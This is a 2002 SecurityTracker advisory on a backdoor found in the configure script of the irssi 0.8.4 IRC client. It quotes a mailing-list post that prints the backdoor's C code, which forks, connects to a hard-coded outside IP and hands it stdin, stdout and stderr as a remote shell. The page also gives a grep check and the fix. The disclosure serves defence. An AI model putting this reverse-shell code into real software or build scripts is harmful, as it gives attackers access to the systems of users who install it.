Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
|
|
|
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
|
|
|
|
|
|
|
|
|
|
|
IRSSI IRC Client for UNIX May Contain a Backdoor in a Certain Version of the Source Code Distribution
|
|
SecurityTracker Alert ID: 1004374 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 25 2002
|
Impact: Root access via network, User access via network
|
Fix Available: Yes
Vendor Confirmed: Yes
|
Version(s): 0.8.4
|
Description: The vendor reported that an unknown user has placed a backdoor in the IRSSI IRC client 0.8.4 source code distribution. The system may connect to a certain IP host and provide that host with remote shell access.
It is reported that someone inserted a remote backdoor in the IRSSI configure script, possibly as early as 2002-04-19. Users that
have installed version 0.8.4 from the source code distribution (but not from the binary) on or after that date may be affected.
The
malicious code is located in the configure script. The code reportedly forks a new process, connects to some server, and gives
stdin/out/err to the server. This gives the server remote access to the system with the privileges of the user installing the IRSSI
script.
The vendor reports that if you installed the IRSSI binary, you are not affected. Also, the Debian sources are not affected.
The CVS version and nightly snapshots appear to be unaffected. The vendor notes that if you let IRSSI download the GLib sources
from irssi.org, those sources contain the backdoor.
To determine if you are vulnerable, if you still have the sources, you can
run 'grep SOCK_STREAM configure'. This command should not return any lines.
|
Impact: A remote user on a specific IP host may be able to gain remote access to the system. The remote shell that the backdoor provides will have the privileges of the user that installed IRSSI using the configure script.
|
Solution: The vendor has reissued version 0.8.4, available at:
http://main.irssi.org/?page=download
|
Vendor URL: main.irssi.org/?page=backdoor (Links to External Site)
|
Cause: Configuration error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: Martin Ostlund <martin@webtech.se>
|
Message History:
None.
|
Source Message Contents
|
Date: Sat, 25 May 2002 16:58:05 +0200
From: Martin stlund <martin@webtech.se>
Subject: irssi backdoored.
|
Hi readers.
I just discovered this on the irssi homepage (irssi is a new, popular
IRC chat client for those who didnt know).
"Just noticed, not sure for how long it's been there. I heard the first
change in the irssi-0.8.4.tar.gz's checksum was 2002/04/19. Guess I'll
have to start watching those myself from now on.. I'm moving the
main.irssi.org elsewhere for now, mirrors should pick up the DNS change
and update themselves automatically..
This code was found from configure - it forks a new process, connects to
some server and gives stdin/out/err to it (ie. giving remote access to
your account):
int s;
struct sockaddr_in sa;
switch(fork()) { case 0: break; default: exit(0); }
if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
exit(1);
}
/* HP/UX 9 (%@#!) writes to sscanf strings */
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("204.120.36.206");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
exit(1);
}
dup2(s, 0); dup2(s, 1); dup2(s, 2);
Also the IP just changed yesterday from 209.164.15.215. If you still
have the irssi sources, you can see if you're affected with grep
SOCK_STREAM configure - if it returns anything, something might have
been done to your system."
- End of quote.
Take care,
Martin Östlund.
|
|
Go to the Top of This SecurityTracker Archive Page
|
